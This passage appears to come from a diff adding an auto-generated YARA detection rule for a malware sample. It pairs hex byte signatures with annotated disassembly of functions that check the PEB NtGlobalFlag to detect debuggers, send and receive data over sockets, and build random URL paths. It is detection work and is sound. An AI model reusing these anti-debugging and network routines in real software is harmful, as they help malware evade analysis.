;sub_00401c20(local12) + .text:0x00402182 83c404 add esp,4 + .text:0x00402185 85c0 test eax,eax + .text:0x00402187 7407 jz 0x00402190 + .text:0x00402189 b801000000 mov eax,1 + .text:0x0040218e eb0e jmp 0x0040219e + .text:0x00402190 loc_00402190: 
[1 XREFS] + .text:0x00402190 8b4510 mov eax,dword [ebp + 16] + .text:0x00402193 50 push eax + .text:0x00402194 e817f8ffff call 0x004019b0 ;sub_004019b0(arg2) + .text:0x00402199 83c404 add esp,4 + .text:0x0040219c 33c0 xor eax,eax + .text:0x0040219e loc_0040219e: [4 XREFS] + .text:0x0040219e 5f pop edi + .text:0x0040219f 5e pop esi + .text:0x004021a0 5b pop ebx + .text:0x004021a1 8be5 mov esp,ebp + .text:0x004021a3 5d pop ebp + .text:0x004021a4 c3 ret + */ + $c34 = { 55 8B EC 81 EC 18 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 02 6A 00 6A 02 68 00 00 00 40 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 6A 00 6A 00 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 83 7D ?? 00 7F ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 
83 C4 04 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004021b0@7faafc7e4a5c736ebfee6abbbc812d80 with 6 features: + - check for PEB NtGlobalFlag flag + - receive data + - receive data on socket + - send HTTP request + - send data + - send data on socket + .text:0x004021b0 + .text:0x004021b0 FUNC: int cdecl sub_004021b0( int arg0, int arg1, int arg2, int arg3, int arg4, ) [2 XREFS] + .text:0x004021b0 + .text:0x004021b0 Stack Variables: (offset from initial top of stack) + .text:0x004021b0 20: int arg4 + .text:0x004021b0 16: int arg3 + .text:0x004021b0 12: int arg2 + .text:0x004021b0 8: int arg1 + .text:0x004021b0 4: int arg0 + .text:0x004021b0 -8: int local8 + .text:0x004021b0 -1032: int local1032 + .text:0x004021b0 -1036: int local1036 + .text:0x004021b0 -1040: int local1040 + .text:0x004021b0 -1552: int local1552 + .text:0x004021b0 -1556: int local1556 + .text:0x004021b0 -1560: int local1560 + .text:0x004021b0 -1564: int local1564 + .text:0x004021b0 -1568: int local1568 + .text:0x004021b0 + .text:0x004021b0 55 push ebp + .text:0x004021b1 8bec mov ebp,esp + .text:0x004021b3 81ec1c060000 sub esp,1564 + .text:0x004021b9 53 push ebx + .text:0x004021ba 56 push esi + .text:0x004021bb 57 push edi + .text:0x004021bc c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004021c6 c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004021d0 c785e8f9ffff0000 mov dword [ebp - 1560],0 + .text:0x004021da c785e4f9ffff0000 mov dword [ebp - 1564],0 + .text:0x004021e4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004021ea 8a5802 mov bl,byte [eax + 2] + .text:0x004021ed 889decf9ffff mov byte [ebp - 1556],bl + .text:0x004021f3 0fbe85ecf9ffff movsx eax,byte [ebp - 1556] + .text:0x004021fa 85c0 test eax,eax + .text:0x004021fc 7405 jz 0x00402203 + .text:0x004021fe e8fdedffff call 0x00401000 ;sub_00401000() + .text:0x00402203 loc_00402203: [1 XREFS] + .text:0x00402203 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402209 8b4018 mov eax,dword [eax + 24] + .text:0x0040220c 
3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402210 8985e8f9ffff mov dword [ebp - 1560],eax + .text:0x00402216 83bde8f9ffff00 cmp dword [ebp - 1560],0 + .text:0x0040221d 7405 jz 0x00402224 + .text:0x0040221f e8dcedffff call 0x00401000 ;sub_00401000() + .text:0x00402224 loc_00402224: [1 XREFS] + .text:0x00402224 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040222a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040222e 83e870 sub eax,112 + .text:0x00402231 8985e4f9ffff mov dword [ebp - 1564],eax + .text:0x00402237 83bde4f9ffff00 cmp dword [ebp - 1564],0 + .text:0x0040223e 7505 jnz 0x00402245 + .text:0x00402240 e8bbedffff call 0x00401000 ;sub_00401000() + .text:0x00402245 loc_00402245: [1 XREFS] + .text:0x00402245 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00402248 51 push ecx + .text:0x00402249 8b5508 mov edx,dword [ebp + 8] + .text:0x0040224c 52 push edx + .text:0x0040224d 8d85f4fbffff lea eax,dword [ebp - 1036] + .text:0x00402253 50 push eax + .text:0x00402254 e857f8ffff call 0x00401ab0 ;sub_00401ab0(local1040,arg0,arg1) + .text:0x00402259 83c40c add esp,12 + .text:0x0040225c 85c0 test eax,eax + .text:0x0040225e 740a jz 0x0040226a + .text:0x00402260 b801000000 mov eax,1 + .text:0x00402265 e9c7010000 jmp 0x00402431 + .text:0x0040226a loc_0040226a: [1 XREFS] + .text:0x0040226a bf98c04000 mov edi,0x0040c098 + .text:0x0040226f 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00402275 83c9ff or ecx,0xffffffff + .text:0x00402278 33c0 xor eax,eax + .text:0x0040227a f2ae repnz: scasb + .text:0x0040227c f7d1 not ecx + .text:0x0040227e 2bf9 sub edi,ecx + .text:0x00402280 8bf7 mov esi,edi + .text:0x00402282 8bc1 mov eax,ecx + .text:0x00402284 8bfa mov edi,edx + .text:0x00402286 c1e902 shr ecx,2 + .text:0x00402289 f3a5 rep: movsd + .text:0x0040228b 8bc8 mov ecx,eax + .text:0x0040228d 83e103 and ecx,3 + .text:0x00402290 f3a4 rep: movsb + .text:0x00402292 8b7d10 mov edi,dword [ebp + 16] + .text:0x00402295 8d95fcfbffff lea edx,dword [ebp - 1028] + 
.text:0x0040229b 83c9ff or ecx,0xffffffff + .text:0x0040229e 33c0 xor eax,eax + .text:0x004022a0 f2ae repnz: scasb + .text:0x004022a2 f7d1 not ecx + .text:0x004022a4 2bf9 sub edi,ecx + .text:0x004022a6 8bf7 mov esi,edi + .text:0x004022a8 8bd9 mov ebx,ecx + .text:0x004022aa 8bfa mov edi,edx + .text:0x004022ac 83c9ff or ecx,0xffffffff + .text:0x004022af 33c0 xor eax,eax + .text:0x004022b1 f2ae repnz: scasb + .text:0x004022b3 83c7ff add edi,0xffffffff + .text:0x004022b6 8bcb mov ecx,ebx + .text:0x004022b8 c1e902 shr ecx,2 + .text:0x004022bb f3a5 rep: movsd + .text:0x004022bd 8bcb mov ecx,ebx + .text:0x004022bf 83e103 and ecx,3 + .text:0x004022c2 f3a4 rep: movsb + .text:0x004022c4 bf88c04000 mov edi,0x0040c088 + .text:0x004022c9 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x004022cf 83c9ff or ecx,0xffffffff + .text:0x004022d2 33c0 xor eax,eax + .text:0x004022d4 f2ae repnz: scasb + .text:0x004022d6 f7d1 not ecx + .text:0x004022d8 2bf9 sub edi,ecx + .text:0x004022da 8bf7 mov esi,edi + .text:0x004022dc 8bd9 mov ebx,ecx + .text:0x004022de 8bfa mov edi,edx + .text:0x004022e0 83c9ff or ecx,0xffffffff + .text:0x004022e3 33c0 xor eax,eax + .text:0x004022e5 f2ae repnz: scasb + .text:0x004022e7 83c7ff add edi,0xffffffff + .text:0x004022ea 8bcb mov ecx,ebx + .text:0x004022ec c1e902 shr ecx,2 + .text:0x004022ef f3a5 rep: movsd + .text:0x004022f1 8bcb mov ecx,ebx + .text:0x004022f3 83e103 and ecx,3 + .text:0x004022f6 f3a4 rep: movsb + .text:0x004022f8 6a00 push 0 + .text:0x004022fa 8dbdfcfbffff lea edi,dword [ebp - 1028] + .text:0x00402300 83c9ff or ecx,0xffffffff + .text:0x00402303 33c0 xor eax,eax + .text:0x00402305 f2ae repnz: scasb + .text:0x00402307 f7d1 not ecx + .text:0x00402309 83c1ff add ecx,0xffffffff + .text:0x0040230c 51 push ecx + .text:0x0040230d 8d85fcfbffff lea eax,dword [ebp - 1028] + .text:0x00402313 50 push eax + .text:0x00402314 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x0040231a 51 push ecx + .text:0x0040231b ff154cb14000 call dword [0x0040b14c] 
;ws2_32.send(0,local1032,0xffffffff,0) + .text:0x00402321 8985f0f9ffff mov dword [ebp - 1552],eax + .text:0x00402327 83bdf0f9ffffff cmp dword [ebp - 1552],0xffffffff + .text:0x0040232e 751d jnz 0x0040234d + .text:0x00402330 8b95f4fbffff mov edx,dword [ebp - 1036] + .text:0x00402336 52 push edx + .text:0x00402337 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0) + .text:0x0040233d ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00402343 b801000000 mov eax,1 + .text:0x00402348 e9e4000000 jmp 0x00402431 + .text:0x0040234d loc_0040234d: [2 XREFS] + .text:0x0040234d 6a00 push 0 + .text:0x0040234f 6800020000 push 512 + .text:0x00402354 8d85f4f9ffff lea eax,dword [ebp - 1548] + .text:0x0040235a 50 push eax + .text:0x0040235b 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x00402361 51 push ecx + .text:0x00402362 ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local1552,512) + .text:0x00402368 8945fc mov dword [ebp - 4],eax + .text:0x0040236b 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040236f 7e71 jle 0x004023e2 + .text:0x00402371 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x00402377 0355fc add edx,dword [ebp - 4] + .text:0x0040237a 8b4518 mov eax,dword [ebp + 24] + .text:0x0040237d 3b10 cmp edx,dword [eax] + .text:0x0040237f 7619 jbe 0x0040239a + .text:0x00402381 8d8df4fbffff lea ecx,dword [ebp - 1036] + .text:0x00402387 51 push ecx + .text:0x00402388 e893f8ffff call 0x00401c20 ;sub_00401c20(local1040) + .text:0x0040238d 83c404 add esp,4 + .text:0x00402390 b801000000 mov eax,1 + .text:0x00402395 e997000000 jmp 0x00402431 + .text:0x0040239a loc_0040239a: [1 XREFS] + .text:0x0040239a 8b4dfc mov ecx,dword [ebp - 4] + .text:0x0040239d 8db5f4f9ffff lea esi,dword [ebp - 1548] + .text:0x004023a3 8b7d14 mov edi,dword [ebp + 20] + .text:0x004023a6 03bdf8fbffff add edi,dword [ebp - 1032] + .text:0x004023ac 8bd1 mov edx,ecx + .text:0x004023ae c1e902 shr ecx,2 + .text:0x004023b1 f3a5 rep: movsd + .text:0x004023b3 8bca mov ecx,edx + 
.text:0x004023b5 83e103 and ecx,3 + .text:0x004023b8 f3a4 rep: movsb + .text:0x004023ba 8b85f8fbffff mov eax,dword [ebp - 1032] + .text:0x004023c0 0345fc add eax,dword [ebp - 4] + .text:0x004023c3 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x004023c9 6880c04000 push 0x0040c080 + .text:0x004023ce 8b4d14 mov ecx,dword [ebp + 20] + .text:0x004023d1 51 push ecx + .text:0x004023d2 e849170000 call 0x00403b20 ;_strstr(arg3,0x0040c080) + .text:0x004023d7 83c408 add esp,8 + .text:0x004023da 85c0 test eax,eax + .text:0x004023dc 7402 jz 0x004023e0 + .text:0x004023de eb2a jmp 0x0040240a + .text:0x004023e0 loc_004023e0: [1 XREFS] + .text:0x004023e0 eb1e jmp 0x00402400 + .text:0x004023e2 loc_004023e2: [1 XREFS] + .text:0x004023e2 837dfc00 cmp dword [ebp - 4],0 + .text:0x004023e6 7502 jnz 0x004023ea + .text:0x004023e8 eb16 jmp 0x00402400 + .text:0x004023ea loc_004023ea: [1 XREFS] + .text:0x004023ea 8d95f4fbffff lea edx,dword [ebp - 1036] + .text:0x004023f0 52 push edx + .text:0x004023f1 e82af8ffff call 0x00401c20 ;sub_00401c20(local1040) + .text:0x004023f6 83c404 add esp,4 + .text:0x004023f9 b801000000 mov eax,1 + .text:0x004023fe eb31 jmp 0x00402431 + .text:0x00402400 loc_00402400: [2 XREFS] + .text:0x00402400 837dfc00 cmp dword [ebp - 4],0 + .text:0x00402404 0f8f43ffffff jg 0x0040234d + .text:0x0040240a loc_0040240a: [1 XREFS] + .text:0x0040240a 8d85f4fbffff lea eax,dword [ebp - 1036] + .text:0x00402410 50 push eax + .text:0x00402411 e80af8ffff call 0x00401c20 ;sub_00401c20(local1040) + .text:0x00402416 83c404 add esp,4 + .text:0x00402419 85c0 test eax,eax + .text:0x0040241b 7407 jz 0x00402424 + .text:0x0040241d b801000000 mov eax,1 + .text:0x00402422 eb0d jmp 0x00402431 + .text:0x00402424 loc_00402424: [1 XREFS] + .text:0x00402424 8b4d18 mov ecx,dword [ebp + 24] + .text:0x00402427 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x0040242d 8911 mov dword [ecx],edx + .text:0x0040242f 33c0 xor eax,eax + .text:0x00402431 loc_00402431: [5 XREFS] + .text:0x00402431 5f pop edi + 
.text:0x00402432 5e pop esi + .text:0x00402433 5b pop ebx + .text:0x00402434 8be5 mov esp,ebp + .text:0x00402436 5d pop ebp + .text:0x00402437 c3 ret + */ + $c35 = { 55 8B EC 81 EC 1C 06 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 98 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 88 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 8D BD ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 7E ?? 8B 95 ?? ?? ?? ?? 03 55 ?? 8B 45 ?? 3B 10 76 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 4D ?? 8D B5 ?? ?? ?? ?? 8B 7D ?? 03 BD ?? ?? ?? ?? 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 8B 85 ?? ?? ?? ?? 03 45 ?? 89 85 ?? ?? ?? ?? 68 80 C0 40 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? EB ?? EB ?? 83 7D ?? 00 75 ?? EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 83 7D ?? 00 0F 8F ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? 
?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 4D ?? 8B 95 ?? ?? ?? ?? 89 11 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402440@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402440 + .text:0x00402440 FUNC: int cdecl sub_00402440( ) [6 XREFS] + .text:0x00402440 + .text:0x00402440 Stack Variables: (offset from initial top of stack) + .text:0x00402440 -8: int local8 + .text:0x00402440 -12: int local12 + .text:0x00402440 -16: int local16 + .text:0x00402440 -20: int local20 + .text:0x00402440 + .text:0x00402440 55 push ebp + .text:0x00402441 8bec mov ebp,esp + .text:0x00402443 83ec10 sub esp,16 + .text:0x00402446 53 push ebx + .text:0x00402447 56 push esi + .text:0x00402448 57 push edi + .text:0x00402449 c745f400000000 mov dword [ebp - 12],0 + .text:0x00402450 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402457 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040245d 8a5802 mov bl,byte [eax + 2] + .text:0x00402460 885df8 mov byte [ebp - 8],bl + .text:0x00402463 0fbe45f8 movsx eax,byte [ebp - 8] + .text:0x00402467 85c0 test eax,eax + .text:0x00402469 7405 jz 0x00402470 + .text:0x0040246b e890ebffff call 0x00401000 ;sub_00401000() + .text:0x00402470 loc_00402470: [1 XREFS] + .text:0x00402470 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402476 8b4018 mov eax,dword [eax + 24] + .text:0x00402479 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040247d 8945f4 mov dword [ebp - 12],eax + .text:0x00402480 837df400 cmp dword [ebp - 12],0 + .text:0x00402484 7405 jz 0x0040248b + .text:0x00402486 e875ebffff call 0x00401000 ;sub_00401000() + .text:0x0040248b loc_0040248b: [1 XREFS] + .text:0x0040248b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402491 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402495 83e870 sub eax,112 + .text:0x00402498 8945f0 mov dword [ebp - 16],eax + .text:0x0040249b 837df000 cmp dword [ebp - 16],0 + .text:0x0040249f 7505 jnz 0x004024a6 + .text:0x004024a1 
e85aebffff call 0x00401000 ;sub_00401000() + .text:0x004024a6 loc_004024a6: [2 XREFS] + .text:0x004024a6 b901000000 mov ecx,1 + .text:0x004024ab 85c9 test ecx,ecx + .text:0x004024ad 7456 jz 0x00402505 + .text:0x004024af e8f6160000 call 0x00403baa ;_rand() + .text:0x004024b4 8845fc mov byte [ebp - 4],al + .text:0x004024b7 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x004024bb 83fa7f cmp edx,127 + .text:0x004024be 7e08 jle 0x004024c8 + .text:0x004024c0 8a45fc mov al,byte [ebp - 4] + .text:0x004024c3 2c7f sub al,127 + .text:0x004024c5 8845fc mov byte [ebp - 4],al + .text:0x004024c8 loc_004024c8: [1 XREFS] + .text:0x004024c8 0fbe4dfc movsx ecx,byte [ebp - 4] + .text:0x004024cc 83f930 cmp ecx,48 + .text:0x004024cf 7c09 jl 0x004024da + .text:0x004024d1 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x004024d5 83fa39 cmp edx,57 + .text:0x004024d8 7e24 jle 0x004024fe + .text:0x004024da loc_004024da: [1 XREFS] + .text:0x004024da 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x004024de 83f861 cmp eax,97 + .text:0x004024e1 7c09 jl 0x004024ec + .text:0x004024e3 0fbe4dfc movsx ecx,byte [ebp - 4] + .text:0x004024e7 83f97a cmp ecx,122 + .text:0x004024ea 7e12 jle 0x004024fe + .text:0x004024ec loc_004024ec: [1 XREFS] + .text:0x004024ec 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x004024f0 83fa41 cmp edx,65 + .text:0x004024f3 7c0e jl 0x00402503 + .text:0x004024f5 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x004024f9 83f85a cmp eax,90 + .text:0x004024fc 7f05 jg 0x00402503 + .text:0x004024fe loc_004024fe: [2 XREFS] + .text:0x004024fe 8a45fc mov al,byte [ebp - 4] + .text:0x00402501 eb02 jmp 0x00402505 + .text:0x00402503 loc_00402503: [2 XREFS] + .text:0x00402503 eba1 jmp 0x004024a6 + .text:0x00402505 loc_00402505: [2 XREFS] + .text:0x00402505 5f pop edi + .text:0x00402506 5e pop esi + .text:0x00402507 5b pop ebx + .text:0x00402508 8be5 mov esp,ebp + .text:0x0040250a 5d pop ebp + .text:0x0040250b c3 ret + */ + $c36 = { 55 8B EC 83 EC 10 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? 
?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? B9 01 00 00 00 85 C9 74 ?? E8 ?? ?? ?? ?? 88 45 ?? 0F BE 55 ?? 83 FA 7F 7E ?? 8A 45 ?? 2C 7F 88 45 ?? 0F BE 4D ?? 83 F9 30 7C ?? 0F BE 55 ?? 83 FA 39 7E ?? 0F BE 45 ?? 83 F8 61 7C ?? 0F BE 4D ?? 83 F9 7A 7E ?? 0F BE 55 ?? 83 FA 41 7C ?? 0F BE 45 ?? 83 F8 5A 7F ?? 8A 45 ?? EB ?? EB ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402510@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402510 + .text:0x00402510 FUNC: int cdecl sub_00402510( int arg0, ) [2 XREFS] + .text:0x00402510 + .text:0x00402510 Stack Variables: (offset from initial top of stack) + .text:0x00402510 4: int arg0 + .text:0x00402510 -8: int local8 + .text:0x00402510 -12: int local12 + .text:0x00402510 -16: int local16 + .text:0x00402510 -20: int local20 + .text:0x00402510 -24: int local24 + .text:0x00402510 + .text:0x00402510 55 push ebp + .text:0x00402511 8bec mov ebp,esp + .text:0x00402513 83ec14 sub esp,20 + .text:0x00402516 53 push ebx + .text:0x00402517 56 push esi + .text:0x00402518 57 push edi + .text:0x00402519 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402520 c745ec00000000 mov dword [ebp - 20],0 + .text:0x00402527 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040252d 8a5802 mov bl,byte [eax + 2] + .text:0x00402530 885df4 mov byte [ebp - 12],bl + .text:0x00402533 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00402537 85c0 test eax,eax + .text:0x00402539 7405 jz 0x00402540 + .text:0x0040253b e8c0eaffff call 0x00401000 ;sub_00401000() + .text:0x00402540 loc_00402540: [1 XREFS] + .text:0x00402540 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402546 8b4018 mov eax,dword [eax + 24] + .text:0x00402549 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040254d 8945f0 mov dword [ebp - 16],eax + 
.text:0x00402550 837df000 cmp dword [ebp - 16],0 + .text:0x00402554 7405 jz 0x0040255b + .text:0x00402556 e8a5eaffff call 0x00401000 ;sub_00401000() + .text:0x0040255b loc_0040255b: [1 XREFS] + .text:0x0040255b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402561 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402565 83e870 sub eax,112 + .text:0x00402568 8945ec mov dword [ebp - 20],eax + .text:0x0040256b 837dec00 cmp dword [ebp - 20],0 + .text:0x0040256f 7505 jnz 0x00402576 + .text:0x00402571 e88aeaffff call 0x00401000 ;sub_00401000() + .text:0x00402576 loc_00402576: [1 XREFS] + .text:0x00402576 6a00 push 0 + .text:0x00402578 e84b160000 call 0x00403bc8 ;_time(ecx,edx,0) + .text:0x0040257d 83c404 add esp,4 + .text:0x00402580 50 push eax + .text:0x00402581 e81a160000 call 0x00403ba0 ;sub_00403ba0(sub_00403bc8(ecx,edx,0)) + .text:0x00402586 83c404 add esp,4 + .text:0x00402589 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040258c 894dfc mov dword [ebp - 4],ecx + .text:0x0040258f c745f800000000 mov dword [ebp - 8],0 + .text:0x00402596 eb09 jmp 0x004025a1 + .text:0x00402598 loc_00402598: [1 XREFS] + .text:0x00402598 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040259b 83c201 add edx,1 + .text:0x0040259e 8955f8 mov dword [ebp - 8],edx + .text:0x004025a1 loc_004025a1: [1 XREFS] + .text:0x004025a1 837df804 cmp dword [ebp - 8],4 + .text:0x004025a5 7d15 jge 0x004025bc + .text:0x004025a7 e894feffff call 0x00402440 ;sub_00402440() + .text:0x004025ac 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004025af 8801 mov byte [ecx],al + .text:0x004025b1 8b55fc mov edx,dword [ebp - 4] + .text:0x004025b4 83c201 add edx,1 + .text:0x004025b7 8955fc mov dword [ebp - 4],edx + .text:0x004025ba ebdc jmp 0x00402598 + .text:0x004025bc loc_004025bc: [1 XREFS] + .text:0x004025bc 8b45fc mov eax,dword [ebp - 4] + .text:0x004025bf c6002f mov byte [eax],47 + .text:0x004025c2 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004025c5 83c101 add ecx,1 + .text:0x004025c8 894dfc mov dword [ebp - 4],ecx + 
.text:0x004025cb c745f800000000 mov dword [ebp - 8],0 + .text:0x004025d2 eb09 jmp 0x004025dd + .text:0x004025d4 loc_004025d4: [1 XREFS] + .text:0x004025d4 8b55f8 mov edx,dword [ebp - 8] + .text:0x004025d7 83c201 add edx,1 + .text:0x004025da 8955f8 mov dword [ebp - 8],edx + .text:0x004025dd loc_004025dd: [1 XREFS] + .text:0x004025dd 837df804 cmp dword [ebp - 8],4 + .text:0x004025e1 7d15 jge 0x004025f8 + .text:0x004025e3 e858feffff call 0x00402440 ;sub_00402440() + .text:0x004025e8 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004025eb 8801 mov byte [ecx],al + .text:0x004025ed 8b55fc mov edx,dword [ebp - 4] + .text:0x004025f0 83c201 add edx,1 + .text:0x004025f3 8955fc mov dword [ebp - 4],edx + .text:0x004025f6 ebdc jmp 0x004025d4 + .text:0x004025f8 loc_004025f8: [1 XREFS] + .text:0x004025f8 8b45fc mov eax,dword [ebp - 4] + .text:0x004025fb c6002e mov byte [eax],46 + .text:0x004025fe 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00402601 83c101 add ecx,1 + .text:0x00402604 894dfc mov dword [ebp - 4],ecx + .text:0x00402607 c745f800000000 mov dword [ebp - 8],0 + .text:0x0040260e eb09 jmp 0x00402619 + .text:0x00402610 loc_00402610: [1 XREFS] + .text:0x00402610 8b55f8 mov edx,dword [ebp - 8] + .text:0x00402613 83c201 add edx,1 + .text:0x00402616 8955f8 mov dword [ebp - 8],edx + .text:0x00402619 loc_00402619: [1 XREFS] + .text:0x00402619 837df803 cmp dword [ebp - 8],3 + .text:0x0040261d 7d15 jge 0x00402634 + .text:0x0040261f e81cfeffff call 0x00402440 ;sub_00402440() + .text:0x00402624 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00402627 8801 mov byte [ecx],al + .text:0x00402629 8b55fc mov edx,dword [ebp - 4] + .text:0x0040262c 83c201 add edx,1 + .text:0x0040262f 8955fc mov dword [ebp - 4],edx + .text:0x00402632 ebdc jmp 0x00402610 + .text:0x00402634 loc_00402634: [1 XREFS] + .text:0x00402634 